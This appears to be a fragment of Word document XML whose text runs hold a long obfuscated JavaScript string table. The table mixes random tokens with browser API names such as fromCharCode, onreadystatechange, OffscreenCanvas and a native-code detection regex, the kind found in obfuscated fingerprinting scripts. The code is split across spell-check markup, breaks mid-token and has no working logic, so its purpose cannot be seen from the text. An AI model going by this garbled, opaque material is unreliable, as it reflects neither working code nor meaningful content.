        <w:t>", "yxOcO78uCu8uDIjR", "JAD7Xpp5TNBQUdy5pVFB0cU_MS8-lUHbCw", "BYdN226SiQeV8nltac4", "RzT_PZA3L8lcW4o", "vXLVPLJgYJckRtu3tm5R7-Z5HQ", "5AaiC853Xw", "qW-_eth2AY9oWdGYvEdkjcdSESwNqhvSBLnNnSQ5iD7prE14JyM0abxxilfrhauZcHLbVXvlM4bKFNftf6VMXYFWcBjSyZoEs_qj-CyLlk46jz4OvjUfixEe1bBWLyM11AFKkTxyGFChmb9NA5HTQnOkguW46szh51YpbGh4G3yNk5hlWyuGpTTT62ofOKqPM3GsJS4gQWOPxEgcCjOglae43cTPI50STLl_lszMHlbZlYjdDyRJ0zY", "4W6sZb0", "Ud8LkALOwlPlpDkXPZzNfiqp2P2D", "yLcKg1bFsAE", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>svg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "MH-mP81CVJk", "2rIU0WTI3iOZvyF-S5jKfiWi4djhW_x4-xJxI_uVaNULQame-I3Hi0yBfrsaYgFm285litcK32Ig-QhBj06ms177lfgyY2WvD0R8VMNncqTXUJL-Vd_xOs6zMFC2hdyeaL-VPdOe_LpMRhOi73U5r6wJZwVYQDNKW-j2wIqJ-5B6cX2LhIdoR8QkDZvAlUN_wNtTjpKens9tNajw_dFFe3gUMyY_1HvjrFWSYT0g8bk_ZFdw5tS6eZwnwwcSoyur4LTN_Us7DAuSXKH_fb8oNm2cNrZHChdDbcnOqCR-H7zPK0v41BFq4f3fTNc-gBFEcmUDUH0Nw3w8RJ8wVVnD5aicumkgkIcT8_0KUiMMqnpYA5XVV_xpiuTkYLcfOhNGfaxda_f5Oe2XsvzyraMqYfd4YWM8ZIJPWX8bT5Qj-o86eFuKyT1po1K_wQydaWwJAlZ15DzxTs_up35x5BSVIBLNSwVtA0X-soOvyMxyGd0lUr1saX_zDTPe5M69GkMDHYrd8p3kK5B80c24B2KxwWRGESTiex6redfeKWGn4YslXgsWuw6WpEJIDgSrV7nu2qi3LOnSouDBv5y0GKoQM1rEMTyOyg6CFMkFUBbRxvHOVC0DkMhEyGP2KTa6IzhkWlfiG1j7MD0SnwuHpMcrRBOmhDOPnKDpdcZPXPgER_oDtZVgL7iyJeVArmBjNdoG0GRyqrd0af1I0Z9o9fFO2g-c-Cqc_YPqCcXJBnwlCsYuD_J0zIq7B5Df90gUYx1xHu2C4sP8P0VDpTAMrU1tIHIX_eEgtB-vHWOS7C9TqlzfAi_-3538dszBf_eLsuPL", "JJN32A-Ht12-hwQ1C-qTI0G3pPGKdeR2gw5dQKyidq87dbiSkLA", "8D-SIrkt", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>UIEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "hV_pN50", "-</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>k_kGb4aQN5eQNfq_zo", "elHAOfhQRcAsOJif3g", "LhesdeF6WpocDMCyjzd-x40Q", "NALlSco4cw", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SubmitEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "FALSE", "L-w6", "__proto__", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>textContent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "hvFLuD70zmyDz28QBg", "80", "KgiAaO59R9AycrmDmVgFoMdxUw", "D6cA8jg", "s8xXkxWj", "TV-EJ-oPM7BcAOLj6itW", "Vst8vQSgz0_wqkEXbN73Cg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>removeEventListener</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "EK0fy03e", "YLMJvnny_jWXsk8QQA", "fQiOKPZ1FLsFCbrf2FoHstosXygWuCKSBA", "\uD83D\uDE0E", "_jqSTO5LQOk1", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>removeChild</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "UGTEI5p0eo0", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>oEueBKhsMKVMdqE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "x9Uv6kjmkR_v3QZdc66oVCeY2anKftIjh3FFUaS3F7YWYee1_O3rs3WpRg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lLkggXWN_Tf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>_", "7_RV5H7ynzaSxk1ZI8SyTmem1g", "unshift", "z9cngRSLxwbX5Wsncw", "join", "MxuHVr8", "g_BIgD2e_GGkgSZVGoW7", "xsE41lzKmEvKhVFkfL_ofzOLsLzXQc8foj9RaN_hWpR2arz_upyMuAv5a_UFFgAmo7Yf25poxyIBkjpszEI", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>phTGBoA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PFWgNNJiUOZhSNU</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "CaUlx2XXyAmW", "xcwXq27T6TLs_g", "v7ZJx1-Tigk", "_kuzK9dOeYJMY8Kf", "QT-oP9tIMIUL", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fireEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>detachEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "cos", "29gvq1r3lQPv", "length", "g_F7yCmlqlLbwG8", "D6YnlWrl8w", "LRLMTYU4Fus", "BFawKMF2cJ9BUM2Ip3I9itxbZz0ysxGPRe7esgA9gwO3oE53DChxKe9Fi0_qk9WONyjgNzzoYbCME6T3ObU", "YqFIunXFvS0", "kdJ-kCa0hHbD0QI", "9_gq7kn62Rbc", "Pq4dkyXB_zGG2gR8aOngEXuN", "ITTVfKM8I-M", "T2fc", "lxa9a59ZFdBATt7v22U7ntRLUnEr80eHNuLt-g", "J88uxn66", "rO4Wwg_1nSrD9j0", "OginKcB-DpcIQffNvTl-1aIA", "2j36OZYx", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>TATsWZgTF_ksCsk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "which", "8Z8DkBy47BS5kWxVHt6CcCnJsuaGHNAuv2cg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>isFinite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "CowoiE3w9QSGkEM0S8U", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>yFHcXIY</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "4gL6ZIkTMv44QIiS3GMtsOxlNCo-", "VHnNef8UE5ZTCfE", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>JRPcVrw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "vs1HhQGKjCPJ7GYFf-DYcX75koSnDg", "V9pPuAe2zizXoGs", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>aqUexmiN</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "start", "QmrhA5gOKw", "uM9b4iao1n3nqS0ORqbeaBOogcLOcfI43w", "33GIQ_tAWaNrKOaztUIuoehs", "performance", "console", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>decodeURIComponent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "XTj2XogcT5ISG9-TsRYzjdEeMXc", "6jy9dcFbdg", "mr1BtGLEjQ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>axg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "iTPoeZk0LPstSA", "2hv-DY0DGqcZAs_mtWgs", "replace", "JluJSIZvLZxPdrTvu29Cp_t8Kjwk0T8", "Ftgei2PYxwXfpzMx", "left", "S9g53gSqsDvO5z5FBw", "OXuUFNB3X615QerGqSp68g", "ZlOte8pHOaZ_SaLBgB4V1rYx", "gsI-pF345wnYpAMUP9A", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>charCodeAt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "1-5v_hXqo0A", "tWesfvtkIZhBX4i1uEs3ndBLVUIvrl4", "Uf8hnVG8", "IlTGXc5yPc5qWY2i1w", "-JEnhiKZ9GHKqBYEWKTUMwfXkObLOQ", "nDW2MsBlKLASDoU", "LP1cyTGU9mbbvX4nTP4", "7z2QUcBAYYQENPa7uw", "0-oi2GChgwE", "tLxPykuRskq2owNRXQ", "^https?:\\\x2F\\\x2F", "m1a_T4VDfJxWBJHBkGo", "c6xj2BGP2k-SglcGLcurGEiJqfOhAoBZp3wUJcmyfNI", "6vE8xHbFsHP0", "X4EyvHOy4jjm6mA7JuCYPQ6CsvD9", "1wH_EYYRDos", "Y5dcuWvEsCP_kipOH8WIehW_h97wTYpppRc", "-_cGwHvugBrYxQphPK65egiU-fTPBw", "_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ALafvxP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "JoAerg8", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SErfHKI</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "L-MOlkflqwjd9CQzfMmibjzx5dDwBqAuug", "LZN-rwm31l-Nk0wDPNTgFUT_iemJLg", "mN9ukDuLlUrZh0sS", "split", "TRUE", "P6U6iHnc-VuoiSIn", "rUDgfI05SuxqBcOb5w", "_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xnkMOwsD</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">-QA", "8y2WPMViX7woO8-Q33EPp_E7EXkfqzT2Ag", </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WjnwZtwe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eZQXvHrlnyk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "fYg5sH0", "description", "r8dU5CGmjg", "szHoa9cLF44QbNvf13kvig", "Jcpx-yD9jEq1", "d9w", "c5l66wm14Q2t", "aC-XFdxdYp8", "zyLEJ6wwIrMvJP_RikUZj8VtGAsutSzpBpn3ymg", "AhWuE511EK4HebbU8zB8kocLSA", "VIYx9k-EjQaa41g", "oHneEeAkDrlQeLzb9nNc5ecwMRUlhzL-YN3g9X9Erl4", "L0-1IsZ2Pr9gG5mZoypo-aUQKC5j4ULUc5S08G13zwM", "OYgF91bz2iSl9CQB", "done", "3zD2NIA1Ug", "qYMh03jhySI", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>initCustomEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Uint8Array", "create", "Intl", "(?:)", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>unescape</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "di-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>TXupMZZA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "EX7iAQ", "mark", "gnvzO9c", "p4EC7nb-", "rY9n7AE", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sjTceA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "zNMWnX_KkDLh5g", "\uD83D\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uDCCA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jYxHyAE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>zkbjQA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "mYMHkVHZ42SNsjEB", "1tVSthGkjw", "log", "head", "push", "constructor", "sin", "fs4knQ_B-Abh4X89P92qSWb5_a6TDQ", "uEHlbIswK7F8V9vL4ldnhYg", "2bMV0GXJ3yKTojdKC6SReCSv4_GnX_9uugA2bpvnMJFNGPzfj_-akEGeKJJqdQJ3gMQjxo9-2A", "6pdJn0yI6CuwungsHpKdfzk", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>AvNA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "3M4V932vszHn9xg", "boolean","8AvjZ5k", "Xgb_f-0tCvQ7GQ", "KEzYL4kJOs9kZob8jA1f0aZuOzV68FXc", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>NkKvQcZRQuBLTY</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-x", "Rw6bN4JAaaMvC9uNpQE61w", "FO1mhwDM4iCDwHEeEpHyXw", "lTTSMbwrPOQjOO_n1VgVt9R-FExG8ySwDYyo4QcZ_Dg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>charAt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "imnhLZE2QcJcHA", "1", "cl3kFc9IHvtm", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DNEKhBLR-Hrvkg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "SMlA9UGJiV7NwThnR-vbLCmjjsKt", "0FnNSoYwP5RHffvo2m4", "3i_Ra7cqIe8mMLek", &gt;&gt;     var g = ["</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fromCharCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "p2OdCdJjYo5AVq3VnWcz579u", "owuuWpM0VbA2Iv7tqnVh1JoEOUgQ8kSXRovK5Dcmuw", "_fI43x6o0WOT2E0ueLziHA", "ckjUauR6W752VQ", "ClyafP4TOrlk", "2Ypz-iaCjG2lmUsAVKLFAlGanuXaeNgfkDE7cMvORQ", "zNlb-nqt-mz4uw", "I3uSbfxzJQ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>iudGmg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "{\\s*\\[\\s*native\\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>s+code</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\\s*]\\s*}\\s*$", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fyTldsREXQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CdsUiA-ZxEfxiic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "x7VfgHDUsmit_QUp", "VTCaefR0WQ", "PIUjxkHUqBmWigYCMer4T3SB47k", "NHfjbshWBP9ObrY", "application\x2Fx-www-form-urlencoded", "PZsu5Brjvyi59HBj", "Y2WQUft6DZZYH4TtvSc6", "MHE", "^(?:[\\0-\\t\\x0B\\f\\x0E-\\u2027\\u202A-\\uD7FF\\uE000-\\uFFFF]|[\\uD800-\\uDBFF][\\uDC00-\\uDFFF]|[\\uD800-\\uDBFF](?![\\uDC00-\\uDFFF])|(?:[^\\uD800-\\uDBFF]|^)[\\uDC00-\\uDFFF])$", "SmLeB7IDDb5zfA", "uFWxBehfSKN6Sp3ktl0UzA", "fEiFXd1E", "ORuFDtNFO4k_Yg", "MnC6NcJ7LcsCGc_OsjsthJpUME4-oFXPB_E", "wC6We9lmWJ4cEpSj8mxy0vE8", "Ib5J1TiEjniowzZ-CIzLXzz7nNuJ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>MDyCecdmWekWbrytiQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "24RBxzOJziCX7A", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>setTimeout</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "aAOzO_0faKlMRA", "vELqZ5suX9FSAQ", "5803ol779AbH8kgXKf6kAEPV6J62N5EX7WRZNY6y", "\uD83C\uDFF4\uDB40\uDC67\uDB40\uDC62\uDB40\uDC65\uDB40\uDC6E\uDB40\uDC67\uDB40\uDC7F", "gw24PM0oOtMJ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>onreadystatechange</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "QnegWe5abZtfVg","name", "JmWMSexUJZwJbaT_1w", "49V6ukuOv1z20kc6E4ekUx7U3rvLdNMK2mRfC9ygXLZwYPa57pfytyXhCo02dw", "oz3IP-9OcA", "DRjjA8xoGA", "yKEJl3rHgDKm9XsyAofWbHO6zo_DRf5u5xM6Ss_VPq1cEvHQ8LnQ0VHzYadGbwhnj8Ap18</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>xAh29z5VoNhVe3sH2ez6JyYGnp", "0MsnwV-MoS_W7zV4QeXXUB2WqZWNNN8", "bg-Vau5CV4w", "l5AJkXjO", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>LGuPQQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "qmu0ceZsNL9VDI-5j0ot", "domain", "d1GNMo9ETsZwPLmPuA9M", "crEN-zrDwWjs_WZNK96PM0Gh2JaQJa5lwg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ReferenceError</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Go0e2HU", "is9ArjOnlDTqp25SRYPdcBa3lI3YYf49hgFkSvzZY7RVZsPZw7D012aHEcQ2JT8DnZIQ56NW_AF46w", "W0OnYpZGYdQQUciNrWtxm6lDEThq5xHWcq-m43o", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>OffscreenCanvas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "33_S", "a4tisxylnnDt8xg", "iPMOj2HK0ho", "Z5EqgH7f7wE", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>parseInt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "XHzTRPMYBMVqIe2jnhYX7o9jUFVL2X68KuDWzW9I2miP0yc-OEFMDZFg1jiJyri5VU8", "IkqgUcAXJ6lBbw", "WZ0OlGbexQK2-j82X8yCOV_2gYWdA69s-3UKC_qTAKkaBf35_5GazEisQ_1dG2lphNR_wc4Qh3kj9E96tx3m_SXVr-o6bHDiB386POlIXe3BFYGrFav0EPb-QXI", "5zTEcNYre5V0OA", "jXLxUZQ-bMNuevW5tz1o1qRV", "D74", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bDKbeclZUqkceQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "d9MCsgbfwU_7oQ", "9CuOY_Z8COMEfKeLkQ", "configurable", "JXC5IMVyb7V_", "ExPoTYlqX8wLTZbwrQFeydcqMnIy0lSAArSdyEYxhEWSn04rMTdbN9IhtWyS4rP5GH31RR6jdpHJTpX_ScUNN79hVg", "2zzzSIEfSt8CFNK55mUpldYINHYqlQLjcfXD7joyxU_bhm4ram1eJ9AXojDOoP3sbzjId1Gnf96_Yt_SNqA", "Zo0ttRXq4X8", "rrFu5Ru4tFiewkVkarn6RhGX7_HzfNBTzTAXdt3wC8h-Zoiw0KC75GeaV5kpfiRStece5PZ2oGZI2HQ9tXuchy7zs8cCQEvFMGZjb84EfMzwd7DceMfWBNOFHy3c-r3wToHoRPrjju8wZzKyzVQlpdQBQTpoYx00Mcb48-nr_6JARkO-m4hccuoXN6m9s39I6fln_fP6-bgWLsDHnOITWVg9FxEN_UWgji2vVQEFgI0yGHgQ4LvDSfUE4Sg13TOI1p7503gdMGXgLtKHPdcbV1aSHJc9cGk_Sr7ZkwZdOoz9FHit8m5I68GyYuYYsWpdRyowbVw2rUhVPbZYP3ypmrLmgQoCnrE1ieUsLQE9tVwnNbb6YcBLlprUFvNpHiB_VI9GTerNW9Skm8qJgJsFU98BWkRBDOpxQwE-PK48g4EgBH6-_UV0hXHZ6mz6A0JdaXUC7UrPYPv3lA1E0BG2AT2xYXUAenmRn-zRraJCAbMAPMNgQXHZLwTtzfqlBiIYAv_6wqjtXbcN3KSOHVqrqBAmNj_YUjqNSf7qC1eEjphNbDAuhjizxGJ8LnSGJcbLstOsQtOgzvngma6fL4x_WEzmDAmptzC1e9J7dX7cs96pOHtkrrZp31TGCRycFgoJIALePS6UFhkuun6YnLgVYnqPqgXjqNrgGvFlVeMhYNwpk7pDDaDIK8Yml1ZGE4Az4gBo0J9QTN96_-hX5tBx5BegzQOskZrIRbrqI1tKdv4BLtdH5LmTdKvvoyxrCR0FPsv4-uWDHXRcg1NkgnVOGVoblZhTvXbJBUSc3wFgjzvDNw_K67eBQ-H1H8qwmY2zfa3rdkPD4glhfd1g3wvUxrnFxeBU44UVcVNzY3OvAJBb4aKw5BAh_Tj_JA8xcZ-PtPoctuB7JE6z8QLbjC10Sls0L51lmgIa8PrHg8_xJTnA7nqgPKa_0MJoUq3uN6MHHEaeMvWSS2RzNv0gvPHEJKbXiuRCeSf9uXKnH8hwE136DNk1pmhE0dfxQOd9ERe9vj61FtNXeGUTXuB-Mlb7cUeeFgBrEoAHLOxuiKtrsvUqSDIUZ8ErLDgErFHbc0CnqmpCQyCycFNU2mPpiAY52bfaFDsBaYLy7UR1DRAXI4p5ar-8dBRVHvMDE1N9aS2kRBGHbW69u9ubvERwgVsEYiVFsxDqa3f7UMrv_t3--fHYAIyFy_R5Tz94TERj2nJCpatV1qrfYYk9tu0Wh-hBekQryBSWXGYUvx_DhIHkeVgsvlLoq9jGPC-_RYc1KlGLbQdS65vpIIDbM66I_C08tw-</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Y91GotdlP_ssSlEl0FujZy94hBKacDPu53LajqoDlgWOhKpzv1bkZe0sNOLMNoEEuB7UzHOOzyKslJNLpxTx3yqy79HDsE7A9WLAOovLAMON_L4FKnOFX2l_9N2ajn-D64TQylqlcrbG6mTg_UCrdHx_nKAsVm3Qzy8YjnOMQGRCixVlMtMhvXOVHtu-fvMGLX41NC4S09DeB5oCh_urcx9KR8KSRIFhaCTtJn-oTQlutcxKH5Ao32Tzha1XX1wPE5eiQ6-LrVZgEQiUcUKHZJ4dgfyrBHYCsorIb_PX6QsrW3R9vK0PmkRZtuoz__xsa5z-Zc1sVFdm3S_iJq7DWx66VnoqhDMfqK4rhzVe7r9pmbF9Jugj2ya_YP-v7_0r-9cSLbJRE28BBDvqZ5rnJpeGjz-WqDQ__nmeAYjcZcN40WxI6hU81mbBpXA6RvFEqgIR1i0l_Hmewkx3ABrE9lJ95U5__rthBQcS5fsIDTecK9oixzyHTHeQ-lN-c3CpwZLtH16r_0hbootQX038z4OU1QipYoxHDJ9Iqzis0pnoadVoME9ap6U0aeFSCw1gkIFcqkTcyuPbDCKaqx7Yr1Bahgi87BuofsBHg6SPb57i23_vNf7z77SDuVyCRKo5lbgOoY_R2eaI3WiUYhAobVjNTwcp2_pBf2bY74Kg-HSNRG46uGR4iby_J10QDg1tOWQtTvhcPjCLmr3Ucb-437Z9-tQ8BTnm4HYuQojk_i1mvsmahuTJCK6cbZKjxOitmuuG3auaKpE2PbAFaQbymWEj0TH4vEuqyNYuy5yb5oMdG5l-FztQEVI7sWKsZILXJu7uXLsvUO18DiJhBoMvdLNXQKlMfizJb_QG2EEspMpEIVy8GShymsVORDmq33NOokDIqwYxsXg6aZtknsFWvTOv0paZ-BD70j17KFIiTp552_Raos7BFHcgsY_v4D46sA8CtZo0_lglJWMlDrRZkVPlfmcorkhRHSZmewXQMdwIhO7B2nmvcHmAEUQz8YDXDJ3ZpUuj9oEtMb_BNCUc94Z4RAdCAMT7QUIGisS0CB_dInj9clJkJeaB8WvXaEBfPT-7pi8XP6rUXA5AxUMmrGG7TBWrV5UlqG5eEgEv3lfo3uAlFQ7HI8dNS2xr4nN_LsPJZmv0JlLPqXdV3fhzk7GaCO0kzfUbno3beo8DwOEhCblIhquyaRVWwwGupay_LvafHcDpgWOqJsFxHPFYYVbxtI9z8q78yfovXzi7IH_RV5WozfdDpF6J3JknwXJuZSmv7IAfq6vPulZt7gJAWwoBeW_U9AKYlDyuOijtNsxAXoCRjx8PK_DNvEQQggDFmY3Fsw6OpiJ7-stG0bf17enkIZPt3G2Kzxnv9NqRvLmJtxkFXhAdI5Oht2s24SQmCVYnezypJ0LJSEZ91FII6ibw3vznavP8xuR4q8nnoop-RURn6FqExbAGJFQxtNGkgEiLzqrmJii-URl-H6JuwKwBeABH4VQCEmQQRbDVsN738CYIJXZhpsV5EigmxpUYOu1RRMJBq3BMsCFbzV69FyLrgBxuR0ycO-lsA4rEr1GVkZLV7DpkCPdpP24LjI29fgcW4QpgPteAkAOEHrLtiA5Bj4c8dAH6177a30aUjHi1zWaNy15TxzMx9uXcXy7UAwnhdLohkVdOP1y8IcPnjNKCF4ulSoo6VSUipIUf8iVcOI_NmlZD_-46MjjkNEriKkzG1jRfr8Clh_86YgZ7kOSgZEvqmbTfokTwRAmHY4thzc-BbIyK4qnHLxUpNDTgJ-HLIyRZlODonWi2ncL4DwB04rn-KFonKicToH-Zl_1_DwaMl6-YXHZ0Uqzxk-Q15co-N4VpOTK0IuAyMKmDVha7Y71V9vTf0x-ILfqCEO36xFdLaNJ_FA7QluR3NLcKuvbwP0ljy-fc4YpJCjEKFlRbyguXR1YyGbUnLCOHjxHMwKUK8Bf0J774lvJ5JiDn8l-XHePo9YRaraqtH9zI", "Z8R7oAyQpwu-", "bFzjFrYVO9lTC8w", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GmvnTZkAK_dPCNU</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "-tg8s1nt_BKS3FYSLO-mEA_R66KiPp8QyXVOL4c", "aTPjYYc5GJMBU9OKsw", "oyTtD5oxM8B1MY22jG4", "e0buMYEyB_pcRo7y", "TBKaOZ8yW_ltHqfxxBBpkg", "NcwHlnfu-</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>w3_","nJMEmmPAsC2suCN_DJbTZg", "F2LmQp4UfMAFEIez-gB-yQ", "VPUouyHp6n_evhwyHK_iQA", "File", "global", "1WOfOeBzPOEdWMPIxg", "pXH-J681G8Ib", "yRv5T7MGC9w7bp62", "closed", "f5U4kDGL8UbPugIaXLrMKgM", "xxTnF5ghPs4d", "3MQymkTO4wL731Bqf4_rVzTFwa7sHIgC5nwCIcLLBcBPB9fi-dPRvRjNLPURWXx8-w", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>LuU</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
